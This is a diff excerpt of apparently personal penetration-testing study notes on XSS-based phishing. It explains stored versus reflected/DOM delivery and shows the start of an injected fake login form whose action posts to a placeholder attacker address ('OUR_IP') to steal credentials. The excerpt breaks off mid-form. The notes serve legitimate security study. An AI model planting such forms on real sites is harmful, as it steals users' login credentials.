ConnorDedic/notes/PNPT/PEH/WEB ATTACKS.md

 - Page Text `DOM.innerHTML`

 **Phishing**
-These work best with `Stored XSS` attacks.
-One basic example is injecting a form into a webpage that is stored, so that we can steal credentials.
+These can either be stored XSS or reflected/DOM.
+If it isn't stored, you may be able to use XSS in the URL and send a malicious link.
+One basic example is injecting a form into a webpage URL, so that we can steal credentials.
 ```html
 <h3>Please login to continue</h3>
 <form action=http://OUR_IP>